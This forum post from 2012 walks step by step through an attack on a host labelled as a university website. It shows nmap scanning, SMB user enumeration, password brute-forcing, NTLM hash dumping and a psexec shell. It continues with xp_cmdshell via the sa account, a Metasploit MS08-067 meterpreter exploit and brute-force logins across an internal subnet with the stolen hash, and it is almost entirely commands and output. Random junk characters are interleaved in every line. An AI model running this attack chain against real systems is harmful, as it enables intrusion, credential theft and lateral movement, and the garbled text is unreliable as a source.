广西师范网站http://202.103.242.241/4 [6 t: `* n9 F; @ G0 T% U( E
+ p4 a( p5 ?! a! zroot@bt:~# nmap -sS -sV 202.103.242.241
4 z1 K' T. a d. C1 [9 Y2 D( Q# W- g+ e6 G' P( [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST* C, ?* t, l) z1 {+ h) y( |& j5 |
7 k" l7 T% p9 Y3 f% BNmap scan report for bogon (202.103.242.241)% \) p% P' x. ~) `1 i
4 Q; n4 C" O8 ?Host is up (0.00048s latency).. ]& h2 n( q5 g
) i9 T4 C! D" xNot shown: 993 closed ports' Y6 y& i. L9 T
% @. W6 K2 f- A" \4 i3 G# J: ?
PORT STATE SERVICE VERSION
7 l0 h; d' `3 D: ^. t3 K% t5 B! O2 W6 b7 b, ^- _/ e% y
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)+ U' ^' X$ W: [4 ?" O9 d
" M) ~; K" X6 s; w' L
139/tcp open netbios-ssn& { {& j) B7 l# y
+ L% ?9 W8 H2 {445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds) ]2 a( g4 n8 i) F4 q4 K; {
* ~, U( c( @% \& l3 u/ V1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
7 H8 x y2 E Y6 \. N3 } M9 w4 c
1026/tcp open msrpc Microsoft Windows RPC
! [- r" }" P8 R8 J3 m
& d! h8 c$ O ^+ T3372/tcp open msdtc?
: K4 \) ~1 l e; ]6 t3 X8 O( D" G3 X1 g! v3 P8 i% y& Z9 e
3389/tcp open ms-term-serv?7 Q5 t A" V+ F+ T% a+ ^! R
) ~8 ~' O2 D- M) E: h, m
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :" w3 Z6 K3 X( \; U$ c+ ~
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r8 }8 W4 i( K j+ N+ [; J
. j0 p0 p& }: u7 M6 ]' \
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions+ W" I# D( Y D
0 f/ j0 R: N9 z5 e$ K
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)/ U! [ w% g1 d+ m' k v# x
- ?' w1 t9 p' p$ w# v& V
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO" {3 C+ B4 A: e; F' o
( q: d% Y! Q4 d2 W/ n+ T! S+ n, M# VSF:ptions,6,”hO\n\x000Z”);' s k+ N% H8 D
, @: a7 w4 t8 {6 v4 jMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, K; O4 U2 o! N6 n) q: Y
0 S- B9 |* E: H5 G7 N7 ^Service Info: OS: Windows. I# I8 y. H; l2 u; _
# p# k3 A7 B$ b2 v" P+ p
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
! A$ D" P) m' o' Q& F* r7 P! d- R# _
( R8 K* G$ {7 e6 e4 ~Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds2 q+ W* T1 W9 w# W- `1 W" @ J
, }7 P- Z* v `! s5 Eroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本8 |3 n! `* c2 [7 d
+ p8 j! c0 o' u-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse! G% S6 z* y% Z# H# C7 Q
0 }& T/ W- h) ]! ^3 H; i0 V
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse- h# K, A5 E" \" c
0 _7 X6 L9 z6 ?: Z+ \
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse) }3 g/ [4 {7 o1 H* z+ A
3 R/ V5 }; @" H+ i-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse. V+ Q" f6 I# z% m, M |7 \) s
* _% i3 `" K, L' c
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
O* T& W! R4 m' ^0 N8 }: l! j0 ?% ~! z$ i+ D4 B
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse5 G/ ^9 }9 b" ~ {( j0 a: Y" y
) p2 t u* i1 V" }-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
$ I& L7 t: }( i- Q7 v, S' k7 @! k n2 |2 W, e" r3 A
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
, t& R- d" I P4 |! m. B5 F# O2 K2 e. c7 V5 C, J
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse' W, `" F$ G! t! K: O
/ Z- _! ]& Y0 }) [0 K5 h6 d! h: ~-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
- Z* @4 |9 H8 R0 N9 N3 t9 z# F7 G) x$ F
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
0 T6 ?+ Z" i# E- \
( G8 K- ?8 R( k-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse$ q o' P: [: ^ s* q7 O7 d
! P0 l/ a: d' _$ x5 a
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
6 p1 \$ u' a* V
- ~0 `: f# O) F9 _-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
7 H! ?" h6 }) Y T; q9 u+ u
: E9 {' E4 _6 e. B-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse" z8 I# V4 Z! B4 y" Y& ^
9 B9 ]9 N6 F! y' m5 N% ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 , V; u$ I1 `4 M# q. y
: ~6 U3 Z) H: Q1 ~5 }* Q
//此乃使用脚本扫描远程机器所存在的账户名
; Q( y6 Z+ [7 @# n% K( g5 l& ?7 p' X( O8 F
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
! o3 n6 R* D0 ~0 ^
* m8 d, m: {' c( f) @" pNmap scan report for bogon (202.103.242.241)2 C' z k+ u( e
8 L' B" g+ {0 h4 u' }
Host is up (0.00038s latency).
6 d, k+ U% r) H% u6 i/ ~" s/ R9 G/ o1 {' T# v* m4 ^
Not shown: 993 closed ports
3 z5 L+ p; A2 g" x% ?, s" s
$ R$ d/ ^# N( H( ]' r; O& JPORT STATE SERVICE
3 [; a/ h) B/ a* s) ?* {: d, O9 |- K- ?2 h# e" M
135/tcp open msrpc
0 Y# D' ?5 g" @, \
( v* h2 L: l. c139/tcp open netbios-ssn
. A T" Z) q9 M( o* {- j/ n8 u4 S! i& u4 u/ N8 o; Z! D2 k# L, x
445/tcp open microsoft-ds
; S5 M5 V3 J6 L/ e6 |$ }, j; k, U. B; n! ], D3 ^: r
1025/tcp open NFS-or-IIS
: k: y* V0 w$ i4 O! j4 z8 |" U( x3 r: F# W6 O$ r7 Z
1026/tcp open LSA-or-nterm& m9 V0 l; ?. F: Y* E
8 M7 `* c" H+ k8 d$ o* x
3372/tcp open msdtc5 z: ^+ {. @' A! z
, }0 }# I& d J
3389/tcp open ms-term-serv
$ L* B# a- a6 q) `9 t5 l0 A7 j8 h7 w* e: x
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ O- f$ z8 |8 y* w- G) t# V
& V+ p% b# ?9 G2 A7 Y% G# l
Host script results:
5 A2 f6 `/ g/ U6 W" U8 r0 y6 [$ L! h. x/ @$ | `% p' Z' w
| smb-enum-users:' ]9 Z/ `. y4 B, o, N8 `
# p: N; w- g1 y6 H' E: H, e
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
, g ^* c. H- G" s' A
6 M- O) O. b) \: MNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
- C! Z) j4 ?# t% X# j) Q- @& _
# b# G0 J( e7 M0 G* ~4 D; groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
* `" Y/ l, o3 c8 m" o' ~& r, i7 U- Z( K
//查看共享
4 n% U3 z" R$ X2 b; m; T z6 u' y4 d0 W& b& L# L4 b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST/ k+ _! O. I& {6 M% g# q P
" C# R/ g9 x/ X8 i4 `; D6 ?! e
Nmap scan report for bogon (202.103.242.241)* h: s6 q' z, y" D/ a) j: h
9 s* j9 H5 C$ T2 {- J C# h" EHost is up (0.00035s latency).
; ]' X) L' {$ W" O u% F- C- ^/ T. @
Not shown: 993 closed ports
3 _7 q8 q& x9 e, M" l7 c3 C
/ \) e. b% @: Y2 [PORT STATE SERVICE& k: F+ m2 K: e5 u, f4 ^
- m# a, C' _& `' u/ T: {. g& J135/tcp open msrpc
$ U7 W* E7 ]' Y( O* _& p. x1 y) U' _/ @. q
139/tcp open netbios-ssn
2 D* Q7 I9 v+ D
4 l0 h, `, \7 _: T445/tcp open microsoft-ds
* `4 X7 n: r* o
& U' k6 k9 d+ u7 u6 r: J! h8 Q1025/tcp open NFS-or-IIS" S6 ^+ }3 w6 s) \/ @4 G1 c
- R/ k) Y' G% y d |3 q8 f; [$ |1026/tcp open LSA-or-nterm6 r( N2 G2 a Z. }) J
0 G* I* N! H0 v2 [7 @- N1 U
3372/tcp open msdtc: a' @2 v( [2 G. o% Z1 b8 Y
; K9 W, b5 S8 D8 j9 i; M* B3389/tcp open ms-term-serv
2 G' Z2 b" n( i* Z! v* v# |0 \% T/ B1 Q, U; T$ U; o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ x- d9 u, n7 s$ h! }. a+ j% d
* H+ @" G l- A1 t' O' A6 q
Host script results:* P* j5 `7 h W4 L$ s- c7 ?+ v
2 |) U1 \( i" ^
| smb-enum-shares:
% _; ?/ {0 r+ N2 O; @& X, w8 C: U8 D8 x
| ADMIN$
8 E& G6 x# G, x+ C3 m7 J0 E( ^& N7 I% o, ]
| Anonymous access: <none>
% s @" e0 N" S: H0 A4 B% X
1 O d9 _6 C5 K5 F. q2 z/ p| C$
; u9 K& B b: Y1 C
/ [# H4 ^5 q4 V$ S9 L| Anonymous access: <none>
# s3 t! {; W% n( ?% P1 ~& k/ `0 J
| IPC$0 ^* f) c% K. {2 b9 u1 F
' m: P, l$ Q0 |# ?4 j
|_ Anonymous access: READ7 X1 V/ B- z* j
, H- k4 Q9 [, G/ }! h3 X
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds) V0 p+ \- h8 E1 j4 `/ \6 | B
" M i5 a3 g- X: U$ _% N; V s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 1 x1 G6 k% F& s8 Z2 |$ G# F" @
4 m/ y% Q# K4 { _ r' e
//获取用户密码
L8 O, g# j* n3 ~" V, A- U) _. I! U. z3 a8 Z: y4 M& S; c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST7 ^! h+ y `4 g" \& u6 c) x
8 t q/ I8 K! sNmap scan report for bogon (202.103.242.2418)
% P! s# r4 l' A$ V! f
+ a* D) b( a" _6 X1 p5 @Host is up (0.00041s latency).3 F T/ z2 ?* L; r4 F8 T
' s* @/ u+ }; C9 r+ Z& K$ a1 O
Not shown: 993 closed ports
0 K6 { ^% E! ~0 l' U# t) B( p1 P1 a3 G
PORT STATE SERVICE
3 P$ x2 b9 V' A$ }6 x0 X; y# ^- K$ h Y; b
135/tcp open msrpc( `% I7 `3 \4 h3 N6 [3 d
: j7 Z b% X. J. o139/tcp open netbios-ssn. _7 u+ }6 Q4 k: ?$ ]
* Z6 ^ } w' r( P3 D/ U3 p+ A445/tcp open microsoft-ds
' ~) s. x+ N9 ~/ u0 n, d, C( k' r) {* v9 f `
1025/tcp open NFS-or-IIS. [ i Q2 t; Z, a5 \2 F4 A
' N/ I( S2 z5 m! G1026/tcp open LSA-or-nterm+ x; S+ H% M2 I7 ]
) s( }) K& x! B8 z. u3372/tcp open msdtc: b D( a$ D; j. z
# z+ C ^! @ t
3389/tcp open ms-term-serv2 K, A" G9 O3 {- R, K
! t3 [: F3 v; N/ zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ z h6 B9 L) {0 C. u" f
6 H3 W7 j. E7 A+ V* AHost script results:
& H5 L/ _) L% l4 i$ r& ~: ]
. x2 x5 v5 O8 t! O; [| smb-brute:
# E0 s L4 W4 b* ^+ e1 e& E1 {4 Z! h/ [1 h9 \2 Z" k5 g
administrator:<blank> => Login was successful
- P, Q- \- |, ^$ A1 U6 [. H$ q* F0 t& y7 L3 d
|_ test:123456 => Login was successful$ t P( M& R2 I" X) k7 J+ q
- A) V2 w, C7 k3 SNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
$ V) i' t& d8 f( D5 b) y) E8 T6 p, P' z6 E; M. m4 q
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash: S0 e6 D, B- Z# t+ [, s
. Y1 p- g& l F: O
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data) b4 R) l; u9 Y1 k# Q; h3 e+ Z: f7 ]
- m C0 s; J! d* N% `, \
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
; _& J7 f# a& D
% a9 {0 S6 e5 j1 y- mroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139, \ u# Q+ t: E7 w
, ~) a1 t, M2 G0 y; c0 h4 n9 F
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST2 v+ [# g' v( G( g
8 U6 K9 P0 |" D7 e: }/ i- ]& yNmap scan report for bogon (202.103.242.241)
$ }# s# F, K+ @7 _' F2 [0 e% a( D1 H/ q9 W+ d0 B7 J
Host is up (0.0012s latency).
: U% f+ c# R2 @) }3 ]( X: e
! y7 x+ S, I" \+ r7 v. p: ?PORT STATE SERVICE
/ j/ _5 V' y I
+ C; ?. Q$ {2 v" v135/tcp open msrpc
. y# h2 X7 M5 G4 {/ n) S M6 Y' T7 q# S& q0 A0 Z# L1 k
139/tcp open netbios-ssn
8 t0 g4 P3 j( _( \6 |) k$ f& S$ x
* ?, O5 x: c# B3 f D, y/ [445/tcp open microsoft-ds( e3 K. ?) @/ G5 O* u
) ]+ j8 K. x- s: J" e! A
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ y: u7 ^9 c0 d3 q( U
) o* s5 i) o u& r0 H
Host script results:
' \: d2 }/ p* a7 @0 \, k" I- W9 a! h7 M% m5 {+ J1 \8 f$ q2 u0 D
| smb-pwdump:
- p% U1 O( c3 F, S( Z
7 L3 M* n0 i* S1 J| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
+ p! x/ L( w2 y- m' B% A
1 W( Y% P4 L3 F) d! O4 r| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************5 h( @7 A3 _2 a
1 K- w& l; x2 V2 s1 E7 B* Z: }
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4$ x. {8 w/ ^5 m" R* s4 g
6 k* q. U2 t/ D3 Z
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 `4 l0 u% ^/ Y8 B+ z# {2 T a3 z6 X4 h5 o8 k
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
- A( |+ x k% C# u- L0 T Q
5 K- ^ [+ Z Y% m; i0 U8 b- B* zC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell* c2 x$ D# G9 o8 w. ?( C: k" p
8 Z; Q2 W+ l$ I$ U9 m0 \-p 123456 -e cmd.exe' Q- v+ W6 F1 W( w7 {! h3 r
1 _. E7 J" G+ f+ x/ iPsExec v1.55 – Execute processes remotely
8 D3 R. c9 G+ \3 X- b. E' O+ G: r/ q/ h1 e& |# v9 S9 [
Copyright (C) 2001-2004 Mark Russinovich6 @" Q2 g7 u! b
7 G8 z/ S0 z$ L" }5 J% XSysinternals – www.sysinternals.com% s1 X; p4 |: ~" g( H
: q9 X0 Z5 ? h4 ^
Microsoft Windows 2000 [Version 5.00.2195]. M8 ]2 z- W, }4 i. s5 j1 u
- e3 n7 D& Y! w- ~(C) 版权所有 1985-2000 Microsoft Corp.
. r- {$ f& @1 N- `
* M6 i" |' E. @0 r, S6 l2 N6 v: _C:\WINNT\system32>ipconfig% v3 Y5 T# q% ]5 Q# q
' N' n( `1 l1 q0 s& R- f6 y4 ?* z4 y8 {
Windows 2000 IP Configuration
F6 i3 M F$ Z- W0 z3 [8 O S5 W0 F, a% I( a- y" v
Ethernet adapter 本地连接:* e( h$ @( q% P$ ~! e
; p0 G, U3 U" V3 G l
Connection-specific DNS Suffix . :6 O2 ~2 D1 ]. W/ j9 w" R
1 L3 n' Z% W/ ^$ M! t( [
IP Address. . . . . . . . . . . . : 202.103.242.241
J8 v0 T; J% @! V
, L7 {% _: |8 W) n: G; iSubnet Mask . . . . . . . . . . . : 255.255.255.0
" `0 u) R. v g& ]6 N
, g6 o" V' ?6 YDefault Gateway . . . . . . . . . : 202.103.1.1; q6 U2 R' w h& x" X, `$ }0 u
+ Q0 R* ~. ?# \$ q4 uC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
: @! Y, f- l" s% D! `# s6 l. W9 w+ O, ~1 H
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
/ s, f& e: m% [- A4 ?' Y6 Z8 m5 a, H5 ^0 n7 p
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST1 |+ R, |" u* ?4 u
# r: M- h& \/ I+ l$ w' NNmap scan report for bogon (202.103.242.241)
- k6 M& z" p6 }
3 w# h6 U* ]) \5 \Host is up (0.00046s latency).; o" v% \& A4 n+ {0 q
6 K% }% ^8 U/ h7 eNot shown: 993 closed ports
! q- Q- `" b. N4 Y- K9 C$ c G4 ?+ t$ c Y$ O$ Z9 ~
PORT STATE SERVICE: O, Q4 i; h0 x9 E
( L' @. w) G; o, m9 Q135/tcp open msrpc6 s6 |, d6 {# P
" R3 V1 B$ S. w3 j5 n& G139/tcp open netbios-ssn
+ J8 A3 n+ n n. |$ V7 P+ \
9 I% `9 e+ ]) j. x r3 u; e445/tcp open microsoft-ds. S8 g; f' E P
' S6 p3 H' t1 P' L1025/tcp open NFS-or-IIS+ |9 ~- k* D- J- b2 G6 c
( Q1 m: S2 k1 S* m" ?8 W4 |
1026/tcp open LSA-or-nterm
+ } t; \% B0 I5 e: y+ `9 h( D" m: U% E9 C
3372/tcp open msdtc
; ~3 [4 }/ Q8 U! Z; l, Q- Q: v, p/ X( A1 s+ |8 z* F5 s
3389/tcp open ms-term-serv
E6 [4 B1 j, O! A8 K9 f/ j/ W* R, x7 Q# N
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' P, v5 R) r7 H/ y% ?9 B: ~2 u9 H& d4 Q% w
Host script results:1 |. j9 x" t0 u3 B- B4 y/ q
! B* I- l; s: F) r& b
| smb-check-vulns:
7 C; B& r% Y. p6 c0 Q- o
# v8 E) y. ^4 f T; e|_ MS08-067: VULNERABLE
; |) `; I8 [+ H$ a
1 h+ U0 r4 U8 }; k% X6 C7 ^Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds, @0 C1 ]5 X! p
( L) \" y8 G9 R! L8 S1 t
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
, ?) Q) |2 b3 x0 s! I8 P3 s: j; @9 ?; W$ X. q8 N
msf > search ms08
! R& a6 |* f' g
$ Z! H8 k/ y, X7 N* h( B3 y' pmsf > use exploit/windows/smb/ms08_067_netapi( I7 b2 D. S& L" H& C
( G1 L& X9 m+ H( Q/ I1 C
msf exploit(ms08_067_netapi) > show options
2 [; ^/ s& ?- c% G) ?
! H3 F/ C; M! ymsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
; C, V4 J1 O4 ?8 S0 _6 o
, n# l, x( i: @5 U: U- v: Z* tmsf exploit(ms08_067_netapi) > show payloads
4 g& ]6 n* i9 L9 x
1 e# T! r% B' Z. n# _msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
, C( R- T. j4 y9 a$ }* C' n1 l) Y3 l+ Y2 X4 G9 ?9 P6 x
msf exploit(ms08_067_netapi) > exploit7 c9 R, Z9 s7 s
. A) y" O9 P/ \, j: |# U" w3 Bmeterpreter >
! s8 N1 I6 l! O: Z/ t& s6 Y6 h9 i9 L2 [# h2 n$ W6 B6 W$ k( C
Background session 2? [y/N] (ctrl+z)
7 R* A0 E$ j4 p. ~1 A* f2 Y4 I8 Q, _
j# N3 Q+ x+ ?3 |5 E! `msf exploit(ms08_067_netapi) > sessions -l' @! C$ a- p/ G
$ b! b' B2 d% R+ j- @3 r
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt7 s; r {9 R' s- H& r5 |: G3 x
. ?& s0 {' I. T: _
test3 V" G0 C6 q5 G9 T1 Z/ [: G1 }
0 T5 Z# G8 Z& @- a" O: j" l1 b3 e
administrator
! u' A( O: l. D6 B+ ?/ \2 h7 O
9 I! Q: V7 T. i) `- F- [/ {# o# hroot@bt:/usr/local/share/nmap/scripts# vim password.txt" w8 G0 w2 g% s% P# k! s
4 p; v. m6 @2 \' o
44EFCE164AB921CAAAD3B435B51404EE
; m1 W1 u" V% T6 d5 U3 X- u, R `$ R& c# |# L
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 % t7 O- |. w( R! I9 n
) T; Q5 f0 S" P1 D
//利用用户名跟获取的hash尝试对整段内网进行登录) w. P' ]6 P1 E1 B0 l% U
+ i9 V) B& T% J4 s# S1 S& F" y- Y0 J
Nmap scan report for 192.168.1.105) r; K: D5 }4 v: v- r/ s8 [7 f: C
5 W2 y' @& z& f; `% o9 ?0 T/ u
Host is up (0.00088s latency).+ |$ f9 T- n2 t+ k9 Y: J t: r: M
7 @& ~' E. x+ m0 {1 S0 W! E! N) i
Not shown: 993 closed ports# e( E) L* |2 @3 [3 K) _9 |
! `. x B+ c0 L& Y6 L, CPORT STATE SERVICE
+ Z0 Q) H9 W" J+ Y' K& s9 H. w8 j: [7 L
135/tcp open msrpc
% ]9 x- l8 k& n* i" v: ^1 C: V, I
+ s$ g/ K+ M) p; C5 S/ I j/ Y139/tcp open netbios-ssn: v0 I4 e% o% M5 k4 }% i% p
* f0 w$ |" d* N/ D& `: s& Y, `
445/tcp open microsoft-ds' H# n8 N1 O( V. k! `. q5 y$ D
- j" |; g3 C- C4 _: ^6 M% E; X1025/tcp open NFS-or-IIS
. @4 S, t, ?' n# c5 T: J& n8 l% K( m. U
1026/tcp open LSA-or-nterm& k- |0 L+ a9 C
% p- n& g, K5 }! U E: V! G( q3372/tcp open msdtc8 g) Q% Y& y0 Q
7 r- {+ d: ~/ `
3389/tcp open ms-term-serv
+ E+ U; S I6 T/ j" I" ]/ u" ~7 z9 `* N
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! L! ^7 i8 ]% N: M
7 K) \4 y! w# b# O
Host script results:5 j# y$ }9 J5 q7 c0 S8 F/ Y
- N e4 H: e+ b| smb-brute:
6 d: O) }0 o" I) ]2 i
\# M9 S8 R" L$ u|_ administrator:<blank> => Login was successful& p4 S) V/ X+ R( P. j; ^
2 t5 x5 V6 P- _* G4 ~! p8 r! i, B
攻击成功,一个简单的msf+nmap攻击~~·
K4 a5 Q c7 L7 B' A# s( J \
( m, D, j0 p# Q |
发表于 2012-12-4 12:46:42
收藏
支持
反对